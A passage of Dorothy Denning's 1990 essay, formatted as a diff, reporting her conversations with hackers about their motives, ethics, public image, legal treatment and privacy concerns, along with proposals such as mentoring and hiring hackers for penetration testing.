+edited by Peter Denning (DenningP90).
+
+My dialog with Drake increased my curiosity about hackers.  I read
+articles and books by or about hackers.  In addition, I had discussions
+with nine hackers whom I will not mention by name.  Their ages ranged
+from 17 to 28.
+
+The word ``hacker'' has taken on many different meanings ranging
+from 1) ``a person who enjoys learning the details of computer systems
+and how to stretch their capabilities'' to 2) ``a malicious or
+inquisitive meddler who tries to discover information by poking around
+... possibly by deceptive or illegal means ...'' (Steele83).  The
+hackers described in this paper are both learners and explorers who
+sometimes perform illegal actions.  However, all of the hackers I
+spoke with said they did not engage in or approve of malicious acts
+that damage systems or files.  Thus, this paper is not about malicious
+hackers.  Indeed, my research so far suggests that there are very
+few malicious hackers.   Neither is this paper about career criminals
+who, for example, defraud businesses, or about people who use stolen
+credit cards to purchase goods.  The characteristics of many of the
+hackers I am writing about are summed up in the words of one of the
+hackers: ``A hacker is someone who experiments with systems...
+(Hacking) is playing with systems and making them do what they were
+never intended to do.  Breaking in and making free calls is just
+a small part of that.  Hacking is also about freedom of speech and
+free access to information -- being able to find out anything.  There
+is also the David and Goliath side of it, the underdog vs. the system,
+and the ethic of being a folk hero, albeit a minor one.''
+
+Richard Stallman, founder of the Free Software Foundation who calls
+himself a hacker according to the first sense of the word above,
+recommends calling security-breaking hackers ``crackers''
+(Stallman84).  While this description may be more accurate, I shall
+use the term ``hacker'' since the people I am writing about call
+themselves hackers and all are interested in learning about computer
+and communication systems.  However, there are many people like
+Stallman who call themselves hackers and do not engage in illegal
+or deceptive practices; this paper is also not about those hackers.
+
+In what follows I will report on what I have learned about hackers
+from hackers.  I will organize the discussion around the principal
+domains of concerns I observed.  I recommend Meyer's thesis (Meyer89)
+for a more detailed treatment of the hackers' social culture and
+networks, and Meyer and Thomas (MeyerThomas90) for an interesting
+interpretation of the computer underground as a postmodernist rejection
+of conventional culture that substitutes ``rational technological
+control of the present for an anarchic and playful future.''
+
+I do not pretend to know all the concerns that hackers have, nor
+do I claim to have conducted a scientific study.  Rather, I hope
+that my own informal study motivates others to explore the area
+further.  It is essential that we as computer security professionals
+take into account hackers' concerns in the design of our policies,
+procedures, laws regulating computer and information access, and
+educational programs.  Although I speak about security-breaking hackers
+as a group, their competencies, actions, and views are not all the
+same.  Thus, it is equally important that our policies and programs
+take into account individual differences.
+
+In focusing on what hackers say and do, I do not mean for a moment
+to set aside the concerns of the owners and users of systems that
+hackers break into, the concerns of law enforcement personnel, or
+our own concerns as computer security professionals.  But I do
+recommend that we work closely with hackers as well as these other
+groups to design new approaches and programs for addressing the
+concerns of all.   Like ham radio operators, hackers exist, and it
+is in our best interest that we learn to communicate and work with
+them rather than against them.
+
+I will suggest some actions that we might consider taking, and I
+invite others to reflect on these and suggest their own.  Many of
+these suggestions are from the hackers themselves; others came from
+the recommendations of the ACM Panel on Hacking (Lee86) and from
+colleagues.
+
+I grouped the hackers' concerns into five categories: access to
+computers and information for learning; thrill, excitement and
+challenge; ethics and avoiding damage; public image and treatment;
+and privacy and first amendment rights.  These are discussed in
+the next five subsections.  I have made an effort to present my
+findings as uncritical observations.  The reader should not infer
+that I either approve or disapprove of actions hackers take.
+
+
+3.  Access to Computers and Information for Learning
+
+Although Levy's book ``Hackers'' (Levy84) is not about today's
+security-breaking hackers, it articulates and interprets a ``hacker
+ethic'' that is shared by many of these hackers.  The ethic includes
+two key principles that were formulated in the early days of the
+AI Lab at MIT: ``Access to computers -- and anything which might
+teach you something about the way the world works -- should be
+unlimited and total,'' and ``All information should be free.''  In
+the context in which these principles were formulated, the computers
+of interest were research machines and the information was software
+and systems information.
+
+Since Stallman is a leading advocate of open systems and freedom
+of information, especially software, I asked him what he means by
+this.  He said: ``I believe that all generally useful information
+should be free. By `free' I am not referring to price, but rather
+to the freedom to copy the information and to adapt it to one's own
+uses.''  By ``generally useful'' he does not include confidential
+information about individuals or credit card information, for example.
+He further writes: ``When information is generally useful,
+redistributing it makes humanity wealthier no matter who is
+distributing and no matter who is receiving.''  Stallman has argued
+strongly against user interface copyright, claiming that it does
+not serve the users or promote the evolutionary process (Stallman90).
+
+I asked hackers whether all systems should be accessible and all
+information should be free.  They said that it is OK if some systems
+are closed and some information, mainly confidential information
+about individuals, is not accessible.  They make a distinction between
+information about security technology, e.g., the DES, and confidential
+information protected by that technology, arguing that it is the
+former that should be accessible.   They said that information hoarding
+is inefficient and slows down evolution of technology.  They also
+said that more systems should be open so that idle resources are
+not wasted.  One hacker said that the high costs of communication
+hurts the growth of the information economy.
+
+These views of information sharing seem to go back at least as far
+as the 17th and 18th centuries.  Samuelson (Samuelson89) notes that
+``The drafters of the Constitution, educated in the Enlightenment
+tradition, shared that era's legacy of faith in the enabling powers
+of knowledge for society as well as the individual.''  She writes
+that our current copyright laws, which protect the expression of
+information, but not the information itself, are based on the belief
+that unfettered and widespread dissemination of information promotes
+technological progress. (Similarly for patent laws which protect
+devices and processes, not the information about them.)  She cites
+two recent court cases where courts reversed the historical trend
+and treated information as ownable property.  She raises questions
+about whether in entering the Information Age where information is
+the source of greatest wealth, we have outgrown the Enlightenment
+tradition and are coming to treat information as property.
+
+In a society where knowledge is said to be power, Drake expressed
+particular concern about what he sees as a growing information gap
+between the rich and poor.  He would like to see information that
+is not about individuals be made public, although it could still
+be owned.  He likes to think that companies would actually find it
+to their advantage to share information.  He noted how IBM's disclosure
+of the PC allowed developers to make more products for the computers,
+and how Adobe's disclosure of their fonts helped them compete against
+the Apple-Microsoft deal.  He recognizes that in our current political
+framework, it is difficult to make all information public, because
+complicated structures have been built on top of an assumption that
+certain information will be kept secret.  He cites our defense policy,
+which is founded on secrecy for military information, as an example.
+
+Hackers say they want access to information and computing and network
+resources in order to learn.  Both Levy (Levy84) and Landreth
+(Landreth89) note that hackers have an intense, compelling interest
+in computers and learning, and many go into computers as a profession.
+Some hackers break into systems in order to learn more about how
+the systems work.  Landreth says these hackers want to remain
+undiscovered so that they can stay on the system as long as possible.
+Some of them devote most of their time to learning how to break the
+locks and other security mechanisms on systems; their background
+in systems and programming varies considerably.  One hacker wrote
+``A hacker sees a security hole and takes advantage of it because
+it is there, not to destroy information or steal.  I think our
+activities would be analogous to someone discovering methods of
+acquiring information in a library and becoming excited and perhaps
+engrossed.''
+
+We should not underestimate the effectiveness of the networks in
+which hackers learn their craft.  They do research, learn about
+systems, work in groups, write, and teach others.  One hacker said
+that he belongs to a study group with the mission of churning out
+files of information and learning as much as possible.  Within the
+group, people specialize, collaborate on research projects, share
+information and news, write articles, and teach others about their
+areas of specialization.  Hackers have set up a private system of
+education that engages them, teaches them to think, and allows them
+to apply their knowledge in purposeful, if not always legal,
+activity.   Ironically, many of our nation's classrooms have been
+criticized for providing a poor learning environment that seems to
+emphasize memorization rather than thinking and reasoning.  One hacker
+reported that through volunteer work with a local high school, he
+was trying to get students turned on to learning.
+
+Many hackers say that the legitimate computer access they have through
+their home and school computers do not meet their needs.  One student
+told me that his high school did not offer anything beyond elementary
+courses in BASIC and PASCAL, and that he was bored by these.  Hans
+Huebner, a hacker in Germany who goes by the name Pengo, wrote in
+a note to the RISKS Forum (Huebner89) : ``I was just interested in
+computers, not in the data which has been kept on their disks. As
+I was going to school at that time, I didn't even have the money
+to buy my own computer.  Since CP/M (which was the most sophisticated
+OS I could use on machines which I had legal access to) didn't turn
+me on anymore, I enjoyed the lax security of the systems I had access
+to by using X.25 networks.  You might point out that I should have
+been patient and waited until I could go to the university and
+use their machines.  Some of you might understand that waiting was
+just not the thing I was keen on in those days.''
+
+Brian Harvey, in his position paper (Harvey86) for the ACM Panel on
+Hacking, claims that the computer medium available to students, e.g.,
+BASIC and floppy disks, is inadequate for challenging intellectual
+work.  His recommendation is that students be given access to real
+computing power, and that they be taught how to use that power
+responsibly.  He describes a program he created at a public high school
+in Massachusetts during the period 1979-1982.  They installed a
+PDP-11/70 and let students and teachers carry out the administration
+of the system.  Harvey assessed that putting the burden of dealing
+with the problems of malicious users on the students themselves was
+a powerful educational force.  He also noted that the students who
+had the skill and interest to be password hackers were discouraged
+from this activity because they also wanted to keep the trust of
+their colleagues in order that they could acquire ``superuser'' status
+on the system.
+
+Harvey also makes an interesting analogy between teaching computing
+and teaching karate.  In karate instruction, students are introduced
+to the real, adult community.  They are given access to a powerful,
+deadly weapon, and at the same time are taught discipline and
+responsibility.  Harvey speculates that the reason that students
+do not misuse their power is that they know they are being trusted
+with something important, and they want to live up to that trust.
+Harvey applied this principle when he set up the school system.
+
+The ACM panel endorsed Harvey's recommendation, proposing a
+three-tiered computing environment with local, district-wide, and
+nation-wide networks.  They recommended that computer professionals
+participate in this effort as mentors and role models.   They also
+recommended that government and industry be encouraged to establish
+regional computing centers using donated or re-cycled equipment;
+that students be apprenticed to local companies either part-time
+on a continuing basis or on a periodic basis; and, following a
+suggestion from Felsenstein (Felsenstein86) for a ``Hacker's League,''
+that a league analogous to the Amateur Radio Relay League be
+established to make contributed resources available for educational
+purposes.
+
+Drake said he liked these recommendations.  He said that if hackers
+were given access to powerful systems through a public account system,
+they would supervise themselves.  He also suggested that Computer
+Resource Centers be established in low-income areas in order to help
+the poor get access to information.  Perhaps hackers could help run
+the centers and teach the members of the community how to use the
+facilities.  One of my colleagues suggested cynically that the hackers
+would only use this to teach the poor how to hack rich people's
+systems.  A hacker responded by saying this was ridiculous; hackers
+would not teach people how to break into systems, but rather how
+to use computers effectively and not be afraid of them.
+In addition, the hackers I spoke with who had given up illegal
+activities said they stopped doing so when they got engaged in other
+work.
+
+Geoff Goodfellow and Richard Stallman have reported that they have
+given hackers accounts on systems that they manage, and that the
+hackers have not misused the trust granted to them.  Perhaps
+universities could consider providing accounts to pre-college students
+on the basis of recommendations from their teachers or parents.
+The students might be challenged to work on the same homework problems
+assigned in courses or to explore their own interests.  Students
+who strongly dislike the inflexibility of classroom learning might
+excel in an environment that allows them to learn on their own, in
+much the way that hackers have done.
+
+4.  Thrill, Excitement, and Challenge
+
+
+One hacker wrote that ``Hackers understand something basic about
+computers, and that is that they can be enjoyed.  I know none who
+hack for money, or hack to frighten the company, or hack for anything
+but fun.''
+
+In the words of another hacker, ``Hacking was the ultimate cerebral
+buzz for me.  I would come home from another dull day at school,
+turn my computer on, and become a member of the hacker elite.  It
+was a whole different world where there were no condescending adults
+and you were judged only by your talent.  I would first check in
+to the private Bulletin Boards where other people who were like me
+would hang out, see what the news was in the community, and trade
+some info with people across the country.  Then I would start actually
+hacking.  My brain would be going a million miles an hour and I'd
+basically completely forget about my body as I would jump from one
+computer to another trying to find a path into my target.  It was
+the rush of working on a puzzle coupled with the high of discovery
+many magnitudes intensified.  To go along with the adrenaline rush
+was the illicit thrill of doing something illegal. Every step I made
+could be the one that would bring the authorities crashing down on
+me.  I was on the edge of technology and exploring past it, spelunking
+into electronic caves where I wasn't supposed to be.''
+
+The other hackers I spoke with made similar statements about the
+fun and challenge of hacking.  In SPIN magazine (Dibbel90), reporter
+Julian Dibbell speculated that much of the thrill comes from the
+dangers associated with the activity, writing that ``the technology
+just lends itself to cloak-and-dagger drama,'' and that ``hackers
+were already living in a world in which covert action was nothing
+more than a game children played.''
+
+Eric Corley (Corley89) characterizes hacking as an evolved form of
+mountain climbing.  In describing an effort to construct a list of
+active mailboxes on a Voice Messaging System, he writes ``I suppose
+the main reason I'm wasting my time pushing all these buttons is
+simply so that I can make a list of something that I'm not supposed
+to have and be the first person to accomplish this.''  He said that
+he was not interested in obtaining an account of his own on the system.
+Gordon Meyer says he found this to be a recurring theme: ``We aren't
+supposed to be able to do this, but we can'' -- so they do.
+
+One hacker said he was now working on anti-viral programming.  He
+said it was almost as much fun as breaking into systems, and that
+it was an intellectual battle against the virus author.
+
+
+5.  Ethics and Avoiding Damage
+
+
+All of the hackers I spoke with said that malicious hacking was morally
+wrong.  They said that most hackers are not intentionally malicious,
+and that they themselves are concerned about causing accidental
+damage.  When I asked Drake about the responsibility of a person
+with a PC and modem, his reply included not erasing or modifying
+anyone else's data, and not causing a legitimate user on a system
+any problems.  Hackers say they are outraged when other hackers cause
+damage or use resources that would be missed, even if the results
+are unintentional and due to incompetence.  One hacker wrote ``I
+have ALWAYS strived to do NO damage, and to inconvenience as few people
+as possible.  I NEVER, EVER, EVER DELETE A FILE.  One of the first
+commands I do on a new system is disable the delete file command.''
+Some hackers say that it is unethical to give passwords and similar
+security-related information to persons who might do damage.  In
+the recent incident where a hacker broke into Bell South and downloaded
+a text file on the emergency 911 service, hackers say that there
+was no intention to use this knowledge to break into or sabotage
+the 911 system.  According to Emmanuel Goldstein (Goldstein90), the
+file did not even contain information about how to break into the
+911 system.
+
+The hackers also said that some break-ins were unethical, e.g.,
+breaking into hospital systems, and that it is wrong to read
+confidential information about individuals or steal classified
+information.  All said it was wrong to commit fraud for personal
+profit.
+
+Although we as computer security professionals often disagree with
+hackers about what constitutes damage, the ethical standards listed
+here sound much like our own.  Where the hackers' ethics differ from
+the standards adopted by most in the computer security community
+is that hackers say it is not unethical to break into many systems,
+use idle computer and communications resources, and download system
+files in order to learn.  Goldstein says that hacking is not wrong:
+it is not the same as stealing, and uncovers design flaws and security
+deficiencies (Goldstein89).
+
+Brian Reid, a colleague at Digital who has spoken with many hackers,
+speculates that a hacker's ethics may come from not being raised
+properly as a civilized member of society, and not appreciating the
+rules of living in society.  One hacker responded to this with ``What
+does `being brought up properly' mean?  Some would say that it is
+`good' to keep to yourself, mind your own business.  Others might
+argue that it is healthy to explore, take risks, be curious and
+discover.'' Brian Harvey (Harvey86) notes that many hackers are
+adolescents, and that adolescents are at a less advanced stage of
+moral development than adults, where they might not see how the effects
+of their actions hurt others.  Larry Martin (Martin89) claims that
+parents, teachers, the press, and others in society are not aware
+of their responsibility to contribute to instilling ethical values
+associated with computer use.  This could be the consequence of the
+youth of the computing field; many people are still computer illiterate
+and cultural norms may be lagging behind advances in technology and
+the growing dependency on that technology by businesses and society.
+Hollinger and Lanza-Kaduce (HollingerLanza-Kaduce88) speculate that
+the cultural normative messages about the use and abuse of computer
+technology have been driven by the adoption of criminal laws in the
+last decade.  They also speculate that hacking may be encouraged
+during the process of becoming computer literate.  Some of my
+colleagues say that hackers are irresponsible.  One hacker responded
+``I think it's a strong indication of the amount of responsibility
+shown that so FEW actually DAMAGING incidents are known.''
+
+But we must not overlook that the differences in ethics also reflect
+a difference in philosophy about information and information handling
+resources; whereas hackers advocate sharing, we seem to be advocating
+ownership as property.  The differences also represent an opportunity
+to examine our own ethical behavior and our practices for information
+sharing and protection.  For example, one hacker wrote ``I will accept
+that it is morally wrong to copy some proprietary software, however,
+I think that it is morally wrong to charge $6000 for a program that
+is only around 25K long.''  Hence, I shall go into a few of the ethical
+points raised by hackers more closely.  It is not a simple case of
+good or mature (us) against bad or immature (hackers), or of teaching
+hackers a list of rules.
+
+Many computer professionals such as Martin (Martin89) argue the moral
+questions by analogy.  The analogies are then used to justify their
+judgment of a hacker's actions as unethical.  Breaking into a system
+is compared with breaking into a house, and downloading information
+and using computer and telecommunications services is compared with
+stealing tangible goods.  But, say hackers, the situations are not
+the same.  When someone breaks into a house, the objective is to
+steal goods, which are often irreplaceable, and property is often
+damaged in the process.  By contrast, when a hacker breaks into a
+system, the objective is to learn and avoid causing damage.  Downloaded
+information is copied, not stolen, and still exists on the original
+system.  Moreover, as noted earlier, information has not been
+traditionally regarded as property.  Dibbel (Dibbel90) says that
+when the software industries and phone companies claim losses of
+billions of dollars to piracy, they are not talking about goods that
+disappear from the shelves and could have been sold.
+
+We often say that breaking into a system implies a lack of caring
+for the system's owner and authorized users.  But, one hacker says
+that the ease of breaking into a system reveals a lack of caring
+on the part of the system manager to protect user and company assets,
+or failure on the part of vendors to warn managers about the
+vulnerabilities of their systems.  He estimated his success rate
+of getting in at 10-15%, and that is without spending more than an
+hour on any one target system.  Another hacker says that he sees
+messages from vendors notifying the managers, but that the managers
+fail to take action.
+
+Richard Pethia of CERT (Computer Emergency Response Team) reports
+that they seldom see cases of malicious damage caused by hackers,
+but that the break-ins are nevertheless disruptive because system
+users and administrators want to be sure that nothing was damaged.
+(CERT suggests that sites reload system software from secure backups
+and change all user passwords in order to protect against possible
+back doors and Trojan Horses that might have been planted by the
+hacker.  Pethia also noted that prosecutors are generally called
+for government sites, and are being called for non-government sites
+with increasing frequency.)  Pethia says that break-ins also generate
+a loss of trust in the computing environment, and may lead to adoption
+of new policies that are formulated in a panic or management edicts
+that severely restrict connectivity to outside systems.   Brian Harvey
+says that hackers cause damage by increasing the amount of paranoia,
+which in turn leads to tighter security controls that diminish the
+quality of life for the users.  Hackers respond to these points by
+saying they are the scapegoats for systems that are not adequately
+protected.  They say that the paranoia is generated by ill-founded
+fears and media distortions (I will return to this point later),
+and that security need not be oppressive to keep hackers out; it
+is mainly making sure that passwords and system defaults are
+well chosen.
+
+Pethia says that some intruders seem to be disruptive to prove a
+point, such as that the systems are vulnerable, the security personnel
+are incompetent, or ``it's not nice to say bad things about hackers.''
+In the N.Y. Times, John Markoff (Markoff90) wrote that the hacker
+who claimed to have broken into Cliff Stoll's system said he was
+upset by Stoll's portrayal of hackers in ``The Cuckoo's Egg''
+(Stoll90).   Markoff reported that the caller said: ``He (Stoll)
+was going on about how he hates all hackers, and he gave pretty much
+of a one-sided view of who hackers are.''
+
+``The Cuckoo's Egg'' captures many of the popular stereotypes of
+hackers.  Criminologist Jim Thomas criticizes it for presenting a
+simplified view of the world, one where everything springs from the
+forces of light (us) or of darkness (hackers) (Thomas90).  He claims
+that Stoll fails to see the similarities between his own activities
+(e.g., monitoring communications, ``borrowing'' monitors without
+authorization, shutting off network access without warning, and lying
+to get information he wants) and those of hackers.  He points out
+Stoll's use of pejorative words such as ``varmint'' to describe
+hackers, and Stoll's quote of a colleague: ``They're technically
+skilled but ethically bankrupt programmers without any respect for
+others' work -- or privacy.  They're not destroying one or two
+programs.  They're trying to wreck the cooperation that builds our
+networks,'' (Stoll90, p. 159).  Thomas writes ``at an intellectual
+level, it (Stoll's book) provides a persuasive, but simplistic, moral
+imagery of the nature of right and wrong, and provides what -- to
+a lay reader -- would seem a compelling justification for more statutes
+and severe penalties against the computer underground.  This is
+troublesome for two reasons.  First, it leads to a mentality of social
+control by law enforcement during a social phase when some would
+argue we are already over-controlled.  Second, it invokes a punishment
+model that assumes we can stamp out behaviors to which we object
+if only we apprehend and convict a sufficient number of violators.
+...  There is little evidence that punishment will in the long run
+reduce any given offense, and the research of Gordon Meyer and I
+suggests that criminalization may, in fact, contribute to the growth
+of the computer underground.''
+
+
+6. Public Image and Treatment
+
+
+Hackers express concern about their negative public image and
+identity.  As noted earlier, hackers are often portrayed as being
+irresponsible and immoral.  One hacker said that ``government
+propaganda is spreading an image of our being at best, sub-human,
+depraved, criminally inclined, morally corrupt, low life.  We need
+to prove that the activities that we are accused of (crashing systems,
+interfering with life support equipment, robbing banks, and jamming
+911 lines) are as morally abhorrent to us as they are to the general
+public.''
+
+The public identity of an individual or group is generated in part
+by the actions of the group interacting with the standards of the
+community observing those actions.  What then accounts for the
+difference between the hacker's public image and what they say about
+themselves?  One explanation may be the different standards.  Outside
+the hacking community, the simple act of breaking into systems is
+regarded as unethical by many.  The use of pejorative words like
+``vandal'' and ``varmint'' reflect this discrepency in ethics.  Even
+the word ``criminal'' carries with it connotations of someone evil;
+hackers say they are not criminal in this sense.  Katie Hafner notes
+that Robert Morris Jr., who was convicted of launching the Internet
+worm, was likened to a terrorist even though the worm did not destroy
+data (Hafner90)
+
+Distortions of events and references to potential threats also create
+an image of persons who are dangerous.  Regarding the 911 incident
+where a hacker downloaded a file from Bell South, Goldstein reported
+``Quickly, headlines screamed that hackers had broken into the 911
+system and were interfering with emergency telephone calls to the
+police.  One newspaper report said there were no indications that
+anyone had died or been injured as a result of the intrusions.  What
+a relief.  Too bad it wasn't true,'' (Goldstein90).  In fact, the
+hackers involved with the 911 text file had not broken into the 911
+system.  The dollar losses attributed to hacking incidents also are
+often highly inflated.
+
+Thomas and Meyer (ThomasMeyer90) say that the rhetoric depicting
+hackers as a dangerous evil contributes to a ``witch hunt'' mentality,
+wherein a group is first labeled as dangerous, and then enforcement
+agents are mobilized to exorcise the alleged social evil.  They see
+the current sweeps against hackers as part of a reaction to a broader
+fear of change, rather than to the actual crimes committed.
+
+Hackers say they are particularly concerned that computer security
+professionals and system managers do not appear to understand hackers
+or be interested in their concerns.  Hackers say that system managers
+treat them like enemies and criminals, rather than as potential helpers
+in their task of making their systems secure.  This may reflect
+managers' fears about hackers, as well as their responsibilities
+to protect the information on their systems.  Stallman says that
+the strangers he encounters using his account are more likely to
+have a chip on their shoulder than in the past; he attributes this
+to a harsh enforcer mentality adopted by the establishment.  He says
+that network system managers start out with too little trust and
+a hostile attitude toward strangers that few of the strangers deserve.
+One hacker said that system managers show a lack of openness to those
+who want to learn.
+
+Stallman also says that the laws make the hacker scared to communicate
+with anyone even slightly ``official,'' because that person might
+try to track the hacker down and have him or her arrested.  Drake
+raised the issue of whether the laws could differentiate between
+malicious and nonmalicious hacking, in support of a ``kinder, gentler''
+relationship between hackers and computer security people.  In fact,
+many states such as California initially passed computer crime laws
+that excluded malicious hacking; it was only later that these laws
+were amended to include nonmalicious actions (HollingerLanza-Kaduce88).
+Hollinger and Lanza-Kaduce speculate that these amendments and other
+new laws were catalyzed mainly by media events, especially the reports
+on the ``414 hackers'' and the movie ``War Games,'' which created
+a perception of hacking as extremely dangerous, even if that perception
+was not based on facts.
+
+Hackers say they want to help system managers make their systems
+more secure.  They would like managers to recognize and use their
+knowledge about system vulnerabilities.   Landreth (Landreth89)
+suggests ways in which system managers can approach hackers in order
+to turn them into colleagues, and Goodfellow also suggests befriending
+hackers (Goodfellow83).  John Draper (Cap'n Crunch) says it would
+help if system managers and the operators of phone companies and
+switches could cooperate in tracing a hacker without bringing in
+law enforcement authorities.
+
+Drake suggests giving hackers free access in exchange for helping
+with security, a suggestion that I also heard from several hackers.
+Drake says that the current attitude of treating hackers as enemies
+is not very conducive to a solution, and by belittling them, we only
+cause ourselves problems.
+
+I asked some of the hackers whether they'd be interested in breaking
+into systems if the rules of the ``game'' were changed so that instead
+of being threatened by prosecution, they were invited to leave a
+``calling card'' giving their name, phone number, and method of
+breaking in.  In exchange, they would get recognition and points
+for each vulnerability they discovered.  Most were interested in
+playing; one hacker said he would prefer monetary reward since he
+was supporting himself.  Any system manager interested in trying
+this out could post a welcome message inviting hackers to leave their
+cards.  This approach could have the advantage of not only letting
+the hackers contribute to the security of the system, but of allowing
+the managers to quickly recognize the potentially malicious hackers,
+since they are unlikely to leave their cards.  Perhaps if hackers
+are given the opportunity to make contributions outside the
+underground, this will dampen their desire to pursue illegal activities.
+
+Several hackers said that they would like to be able to pursue their
+activities legally and for income.  They like breaking into systems,
+doing research on computer security, and figuring out how to protect
+against vulnerabilities.  They say they would like to be in a position
+where they have permission to hack systems.  Goodfellow suggests
+hiring hackers to work on tiger teams that are commissioned to locate
+vulnerabilities in systems through penetration testing.  Baird
+Info-Systems Safeguards, Inc., a security consulting firm, reports
+that they have employed hackers on several assignments (Baird87).
+They say the hackers did not violate their trust or the trust of
+their clients, and performed in an outstanding manner.  Baird believes
+that system vulnerabilities can be better identified by employing
+people who have exploited systems.
+
+One hacker suggested setting up a clearinghouse that would match
+hackers with companies that could use their expertise, while
+maintaining anonymity of the hackers and ensuring confidentiality
+of all records.  Another hacker, in describing an incident where
+he discovered a privileged account without a password, said ``What
+I (and others) wish for is a way that hackers can give information
+like this to a responsible source, AND HAVE HACKERS GIVEN CREDIT
+FOR HELPING! As it is, if someone told them that `I'm a hacker, and
+I REALLY think you should know...' they would freak out, and run
+screaming to the SS (Secret Service) or the FBI. Eventually, the
+person who found it would be caught, and hauled away on some crazy
+charge.  If they could only just ACCEPT that the hacker was trying
+to help!''  The clearinghouse could also provide this type of service.
+
+Hackers are also interested in security policy issues.  Drake expressed
+concern over how we handle information about computer security
+vulnerabilities.  He argues that it is better to make this information
+public than cover it up and pretend that it does not exist, and cites
+the CERT to illustrate how this approach can be workable.  Other
+hackers, however, argue for restricting initial dissemination of
+flaws to customers and users.  Drake also expressed concern about
+the role of the government, particularly the military, in
+cryptography.  He argues that NSA's opinion on a cryptographic standard
+should be taken with a large grain of salt because of their code
+breaking role.
+
+Some security specialists are opposed to hiring hackers for security
+work, and Eugene Spafford has urged people not to do business with
+any company that hires a convicted hacker to work in the security
+area (ACM90).  He says that ``This is like having a known arsonist
+install a fire alarm.''   But, the laws are such that a person can
+be convicted for having done nothing other than break into a system;
+no serious damage (i.e., no ``computer arson'') is necessary.  Many
+of our colleagues, including Geoff Goodfellow (Goodfellow83) and
+Brian Reid (Frenkel87), admit to having broken into systems in the
+past.  Reid is quoted as saying that because of the knowledge he gained
+breaking into systems as a kid, he was frequently called in to help
+catch people who break in.  Spafford says that times have changed,
+and that this method of entering the field is no longer socially
+acceptable, and fails to provide adequate training in computer science
+and computer engineering (Spafford89).  However, from what I have
+observed, many hackers do have considerable knowledge about
+telecommunications, data security, operating systems, programming
+languages, networks, and cryptography.  But, I am not challenging
+a policy to hire competent people of sound character.  Rather, I
+am challenging a strict policy that uses economic pressure to close
+a field of activity to all persons convicted of breaking into
+systems.   It is enough that a company is responsible for the behavior
+of its employees.  Each hacker can be considered for employment based
+on his or her own competency and character.
+
+Some people have called for stricter penalties for hackers, including
+prison terms, in order to send a strong deterrent message to hackers.
+John Draper, who was incarcerated for his activities in the 1970's,
+argues that in practice this will only make the problem worse.  He
+told me that he was forced under threat to teach other inmates his
+knowledge of communications systems.  He believes that prison sentences
+will serve only to spread hacker's knowledge to career criminals.
+He said he was never approached by criminals outside the prison,
+but that inside the prison they had control over him.
+
+One hacker said that by clamping down on the hobbyist underground,
+we will only be left with the criminal underground.  He said that
+without hackers to uncover system vulnerabilities, the holes will
+be left undiscovered, to be utilized by those likely to cause real
+damage.
+
+Goldstein argues that the existing penalties are already way out
+of proportion to the acts committed, and that the reason is because
+of computers (Goldstein89).  He says that if Kevin Mitnick had
+committed crimes similar to those he committed but without a computer,
+he would have been classified as a mischief maker and maybe fined
+$100 for trespassing; instead, he was put in jail without bail
+(Goldstein89).  Craig Neidorf, a publisher and editor of the electronic
+newsletter ``Phrack,'' faces up to 31 years and a fine of $122,000
+for receiving, editing, and transmitting the downloaded text file
+on the 911 system (Goldstein90). (Since the time I wrote this, a new
+indictment was issued with penalties of up to 65 years in prison.
+Neidorf went on trial beginning July 23.  The trial ended July 27
+when the government dropped all charges.  DED)
+
+7.  Privacy and the First and Fourth Amendments
+
+The hackers I spoke with advocated privacy protection for sensitive
+information about individuals.   They said they are not interested
+in invading people's privacy, and that they limited their hacking
+activities to acquiring information about computer systems or how
+to break into them.  There are, of course, hackers who break into
+systems such as the TRW credit database.  Emanuel Goldstein argues
+that such invasions of privacy took place before the hacker arrived
+(Harpers90).  Referring to credit reports, government files, motor
+vehicle records, and the ``megabytes of data piling up about each
+of us,'' he says that thousands of people legally can see and use
+this data, much of it erroneous.  He claims that the public has been
+misinformed about the databases, and that hackers have become
+scapegoats for the holes in the systems.  One hacker questioned the
+practice of storing sensitive personal information on open systems
+with dial-up access, the accrual of the information, the methods
+used to acquire it, and the purposes to which it is put.  Another
+hacker questioned the inclusion of religion and race in credit records.
+Drake told me that he was concerned about the increasing amount of
+information about individuals that is stored in large data banks,
+and the inability of the individual to have much control over the
+use of that information.  He suggests that the individual might be
+co-owner of information collected about him or her, with control
+over the use of that information.  He also says that an individual
+should be free to withhold personal information, of course paying
+the consequences of doing so (e.g., not getting a drivers license
+or credit card).  In fact, all Federal Government forms are required
+to contain a Privacy Act Statement that states how the information
+being collected will be used and, in some cases, giving the option
+of withholding the information.
+
+Goldstein has also challenged the practices of law enforcement agencies
+in their attempt to crack down on hackers (Goldstein90).  He said
+that all incoming and outgoing electronic mail used by ``Phrack''
+was monitored before the newsletter was shutdown by authorities.
+``Had a printed magazine been shut down in this fashion after having
+all of their mail opened and read, even the most thick-headed
+sensationalist media types would have caught on: hey, isn't that
+a violation of the First Amendment?''  He also cites the shutdown
+of several bulletin boards as part of Operation Sun Devil, and quotes
+the administrator of the bulletin board Zygot as saying ``Should
+I start reading my users' mail to make sure they aren't saying anything
+naughty?  Should I snoop through all the files to make sure everyone
+is being good?  This whole affair is rather chilling.''  The
+administrator for the public system The Point wrote ``Today, there
+is no law or precedent which affords me ... the same legal rights
+that other common carriers have against prosecution should some other
+party (you) use my property (The Point) for illegal activities.
+That worries me ...''
+
+About 40 personal computer systems and 23,000 data disks were seized
+under Operation Sun Devil, a two-year investigation involving the
+FBI, Secret Service, and other federal and local law enforcement
+officials.  In addition, the Secret Service acknowledges that its
+agents, acting as legitimate users, had secretly monitored computer
+bulletin boards (Markoff90a).  Markoff reports that California
+Representative Don Edwards, industry leader Mitchell Kapor, and civil
+liberties advocates are alarmed by these government actions, saying
+that they challenge freedom of speech under the First Amendment and
+protection against searches and seizures under the Fourth Amendment.
+Markoff asks: ``Will fear of hackers bring oppression?''
+
+John Barlow writes ``The Secret Service may actually have done a
+service for those of us who love liberty.  They have provided us
+with a devil.  And devils, among their other galvanizing virtues,
+are just great for clarifying the issues and putting iron in your
+spine,'' (Barlow90).  Some of the questions that Barlow says need
+to be addressed include ``What are data and what is free speech?
+How does one treat property which has no physical form and can be
+infinitely reproduced?  Is a computer the same as a printing press?''
+Barlow urges those of us who understand the technology to address
+these questions, lest the answers be given to us by law makers and
+law enforcers who do not.   Barlow and Kapor are constituting a
+foundation to ``raise and disburse funds for education, lobbying,
+and litigation in the areas relating to digital speech and the
+extension of the Constitution into Cyberspace.''
+
+8.  Conclusions
+
+
+Hackers say that it is our social responsibility to share information,
+and that it is information hoarding and disinformation that are the
+crimes.  This ethic of resource and information sharing contrasts
+sharply with computer security policies that are based on authorization
